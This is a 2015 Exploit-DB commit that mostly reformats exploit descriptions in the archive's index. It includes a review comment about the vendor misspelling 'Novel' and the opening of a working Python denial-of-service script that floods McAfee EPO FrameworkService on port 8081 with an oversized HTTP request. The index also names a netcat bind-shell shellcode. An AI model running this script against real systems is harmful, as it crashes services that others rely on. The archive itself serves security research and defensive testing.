DB: 2015-08-05

Offensive Security 2015-08-05 05:02:03 +00:00
parent 4378e58667
commit a6cc99bac3
16 changed files with 1430 additions and 1430 deletions


@ -459,7 +459,7 @@ id,file,description,date,author,platform,type,port
593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server Remote DoS",2004-10-24,KaGra,windows,dos,0
594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0
598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25
599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,N/A,linux,local,0
601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0
602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0
@ -510,7 +510,7 @@ id,file,description,date,author,platform,type,port
659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0
660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0
663,platforms/windows/remote/663.py,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143
663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143
664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0
665,platforms/windows/dos/665.c,"Orbz Game <= 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0
667,platforms/windows/dos/667.c,"Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0
@ -1147,9 +1147,9 @@ id,file,description,date,author,platform,type,port
1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105
1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0
1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0
1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0
1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21
1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0
1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0
@ -1690,7 +1690,7 @@ id,file,description,date,author,platform,type,port
1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Include Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0
1983,platforms/php/webapps/1983.txt,"MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability",2006-07-05,Kw3[R]Ln,php,webapps,0
1984,platforms/windows/dos/1984.py,"WinRAR <= 3.60 beta 6 (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0
1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0
1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0
1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french)",2006-07-06,NSRocket,windows,local,0
1987,platforms/asp/webapps/1987.txt,"Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability",2006-07-06,"Soroush Dalili",asp,webapps,0
1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian)",2006-07-06,oveRet,windows,local,0
@ -1951,7 +1951,7 @@ id,file,description,date,author,platform,type,port
2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass Vulnerability",2006-08-25,Vipsta,php,webapps,0
2256,platforms/php/webapps/2256.txt,"Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include",2006-08-25,MATASANOS,php,webapps,0
2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 (cl_headers) Include Vulnerability",2006-08-25,Kacper,php,webapps,0
2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110
2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110
2259,platforms/php/webapps/2259.txt,"proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability",2006-08-26,Kacper,php,webapps,0
2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0
2261,platforms/php/webapps/2261.php,"iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0
@ -3274,7 +3274,7 @@ id,file,description,date,author,platform,type,port
3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability",2007-03-30,bd0rk,php,webapps,0
3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 (login.php table) Local File Inclusion Vulnerability",2007-03-30,GoLd_M,php,webapps,0
3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)",2007-03-30,mu-b,linux,remote,53
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143
3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0
3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
@ -3677,7 +3677,7 @@ id,file,description,date,author,platform,type,port
4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0
4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0
4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0
4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080
4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080
4028,platforms/linux/local/4028.txt,"screen 4.0.3 - Local Authentication Bypass Vulnerability (OpenBSD)",2008-06-18,Rembrandt,linux,local,0
4029,platforms/php/webapps/4029.php,"Sendcard <= 3.4.1 (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0
4030,platforms/php/webapps/4030.php,"EQdkp <= 1.3.2 (listmembers.php rank) Remote SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0
@ -4216,7 +4216,7 @@ id,file,description,date,author,platform,type,port
4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit",2007-10-27,bunker,multiple,local,0
4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit (2)",2007-10-27,bunker,multiple,local,0
4572,platforms/multiple/local/4572.txt,"Oracle 10g LT.FINDRICSET Local SQL Injection Exploit (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581
4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581
4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143
4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities",2007-10-27,GoLd_M,php,webapps,0
4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability",2007-10-28,ZynbER,php,webapps,0
@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
4654,platforms/php/webapps/4654.txt,"PBLang <= 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0
4655,platforms/php/webapps/4655.txt,"project alumni <= 1.0.9 - Remote XSS / SQL Injection Vulnerability",2007-11-24,tomplixsee,php,webapps,0
4656,platforms/php/webapps/4656.txt,"RunCMS <= 1.6 - Local File Inclusion Vulnerability",2007-11-24,BugReport.IR,php,webapps,0
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0
4658,platforms/php/webapps/4658.php,"RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit",2007-11-25,BugReport.IR,php,webapps,0
4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion Vulnerability",2007-11-25,ShAy6oOoN,php,webapps,0
4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,IRCRASH,php,webapps,0
@ -4366,7 +4366,7 @@ id,file,description,date,author,platform,type,port
4721,platforms/php/webapps/4721.txt,"Wordpress <= 2.3.1 - Charset Remote SQL Injection Vulnerability",2007-12-11,"Abel Cheung",php,webapps,0
4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion Vulnerability",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0
4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu <= 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0
4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80
4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80
4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0
4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 head.php Remote File Inclusion Vulnerability",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0
4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability",2007-12-13,MurderSkillz,php,webapps,0
@ -4974,8 +4974,8 @@ id,file,description,date,author,platform,type,port
5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0
5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0
5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510
5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0
5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP Denial of Service Exploit",2008-04-02,muts,windows,dos,0
5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0
5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service Exploit",2008-04-02,muts,windows,dos,0
5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability",2008-04-02,NoGe,php,webapps,0
5346,platforms/windows/local/5346.pl,"XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit",2008-04-02,haluznik,windows,local,0
5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
@ -5092,7 +5092,7 @@ id,file,description,date,author,platform,type,port
5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion Vulnerability",2008-04-17,by_casper41,php,webapps,0
5460,platforms/windows/dos/5460.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0
5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG Wireless Driver Remote BoF Exploit (meta)",2008-04-17,oveRet,windows,remote,0
5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0
5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - .SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0
5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability",2008-04-18,MajnOoNxHaCkEr,php,webapps,0
5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability",2008-04-18,"Aria-Security Team",php,webapps,0
5465,platforms/php/webapps/5465.txt,"2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0
@ -6951,7 +6951,7 @@ id,file,description,date,author,platform,type,port
7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection Vulnerability",2008-12-10,"Hussin X",php,webapps,0
7408,platforms/php/webapps/7408.txt,"living Local 1.1 (xss-rfu) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0
7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0
7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (vista) (0day)",2008-12-10,muts,windows,remote,0
7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (Vista) (0day)",2008-12-10,muts,windows,remote,0
7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability",2008-12-10,Osirys,php,webapps,0
7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 (sql/dd) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0
7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0
@ -9020,7 +9020,7 @@ id,file,description,date,author,platform,type,port
9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability",2009-08-31,HxH,php,webapps,0
9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0
9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0
9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0
9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0
@ -12519,7 +12519,7 @@ id,file,description,date,author,platform,type,port
14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability",2010-07-05,RoAd_KiLlEr,php,webapps,0
14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 Admin Interface DoS",2010-07-06,muts,windows,dos,8800
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface DoS",2010-07-06,muts,windows,dos,8800
14235,platforms/linux/shellcode/14235.c,"nc -lp 31337 -e /bin//sh polymorphic linux shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0
14238,platforms/php/webapps/14238.txt,"BS Auction <= SQL Injection Vulnerability Exploit",2010-07-06,"Easy Laster",php,webapps,0
@ -17259,7 +17259,7 @@ id,file,description,date,author,platform,type,port
19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS Vulnerability",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0
19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 pam_console Vulnerability",2000-05-03,"Michal Zalewski",linux,local,0
19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 Vulnerability",2000-05-16,"Stephen Friedl",hardware,remote,0
20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0
20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0
19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 Environmental Variables Disclosure Vulnerability",2000-05-10,"Black Watch Labs",multiple,remote,0
19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability",2000-05-11,"Ussr Labs",windows,dos,0
19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability",2000-05-11,"Cerberus Security Team",windows,remote,0
@ -17379,17 +17379,17 @@ id,file,description,date,author,platform,type,port
20030,platforms/unix/remote/20030.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0
20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0
20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0
20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0
20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0
20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Stored XSS - blind SQLi - rce",2012-07-22,muts,asp,webapps,0
20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0
20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0
20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0
20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0
20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 DoS Vulnerability",2000-06-25,"MDMA Crew",windows,dos,0
20040,platforms/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Buffer Overflow Vulnerability",2000-06-27,UNYUN,windows,remote,0
20041,platforms/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 File Access Vulnerability",2000-06-26,"Larry W. Cashdollar",cgi,remote,0
20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 Weak Password Encryption Vulnerability",2000-06-26,"Larry W. Cashdollar",unix,local,0
20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - _SUMMON_ Buffer Overflow Vulnerability",2000-06-29,"Matt Conover",linux,remote,0
20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0
20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0
20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0
20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability",2000-06-21,"Michael Zalewski",unix,remote,0
20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0
@ -17406,7 +17406,7 @@ id,file,description,date,author,platform,type,port
20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 Internal Variable Override Vulnerability",2000-07-04,"Adrian Daminato",cgi,remote,0
20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - _/INVITE_ Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0
20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0
20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0
20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 - Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0
20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0
20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 File Existence Disclosure Vulnerability",2000-07-08,"Andrew Lewis",windows,remote,0
@ -17431,7 +17431,7 @@ id,file,description,date,author,platform,type,port
20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 Piped Command Vulnerability",2000-07-18,Prizm,cgi,remote,0
20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0
20087,platforms/php/webapps/20087.py,"Zabbix <= 2.0.1 - Session Extractor (0day)",2012-07-24,muts,php,webapps,0
20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability",2000-07-17,"Zuo Lei",windows,remote,0
20090,platforms/hardware/remote/20090.txt,"HP JetDirect J3111A Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,remote,0
20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read Vulnerability",2000-04-03,S21Sec,multiple,remote,0
@ -17696,7 +17696,7 @@ id,file,description,date,author,platform,type,port
20365,platforms/php/webapps/20365.py,"Wordpress Plugin ThreeWP Email Reflector 1.13 - Stored XSS",2012-08-08,loneferret,php,webapps,0
20366,platforms/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
20367,platforms/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 POST File Read",2012-08-08,muts,windows,webapps,0
20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 - POST File Read",2012-08-08,muts,windows,webapps,0
20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 PASV Mode FTP Internal Address Disclosure Vulnerability",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution Vulnerability",2000-10-29,"Mark Stratman",cgi,remote,0
20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability",1995-10-30,"Dan Shearer",windows,remote,0
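Review bot: The reworded row for id 5344 at L111 still spells the vendor as "Novel" even though the commit is editing exactly that description field; eDirectory is a Novell product, so the row should read `5344,platforms/windows/dos/5344.py,"Novell eDirectory HTTP - Denial of Service Exploit",2008-04-02,muts,windows,dos,0`. The same misspelling appears in the header comment of the 5344.py script touched later in this commit, which is worth fixing in the same pass so the index and the file agree. The other touched rows in this section follow the "Product Version - Detail" pattern consistently; only the vendor spelling is left inconsistent with the capitalization fixes the commit applies elsewhere (e.g. "vista" to "Vista" at L129).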



@ -1,75 +1,75 @@
#!/usr/bin/python
# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
# More than meets the eye
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/mcafee_again.py.txt
# EAX 00840C30
# ECX 00837830
# EDX 01EACF18
# EBX 00004000
# ESP 01EAFF04
# EBP 01EAFF38
# ESI 00837830
# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
# EIP 42424242
import socket
import os
import sys
from time import sleep
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
